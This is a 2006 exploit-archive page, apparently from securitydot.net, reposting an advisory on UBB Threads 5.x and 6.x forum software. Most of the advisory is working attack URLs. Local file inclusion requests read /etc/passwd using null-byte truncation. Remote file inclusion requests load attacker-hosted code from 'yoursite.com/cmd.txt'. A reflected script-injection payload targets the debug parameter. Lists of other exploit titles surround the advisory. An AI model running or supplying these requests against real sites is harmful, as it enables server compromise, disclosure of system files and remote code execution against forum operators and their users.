exploits , vulnerabilities , articles , UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities

2006-05-22 UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
2006-03-02 vuBB <= 0.2 (Cookie) Final Remote SQL Injection Exploit (gpc=off)
2005-04-19 UBB Threads "printthread.php" Remote SQL Injection Exploit
2004-11-16 UBB.Threads 6.2.*-6.3.* one char bruteforce Exploit

2006-05-28

UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities

Rated as : High Risk

UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on UBBThreads 5.x,6.x
Original advisory can be found at: http://www.nukedx.com/?viewdoc=40
Succesful exploitation register_globals on
Version 6.x
GET ->
http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
EXAMPLE ->
http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
If php version < 4.1.0 or UBB version <= 5.x
GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
EXAMPLE ->
http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
XSS:
GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
EXAMPLE ->
http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>
securitydot.net - 2006-05-28

Exploits - newest 10 RSS | More

2007-06-15 57269 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34200 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42418 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29328 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19768 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16705 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19403 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16589 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33605 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17230 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit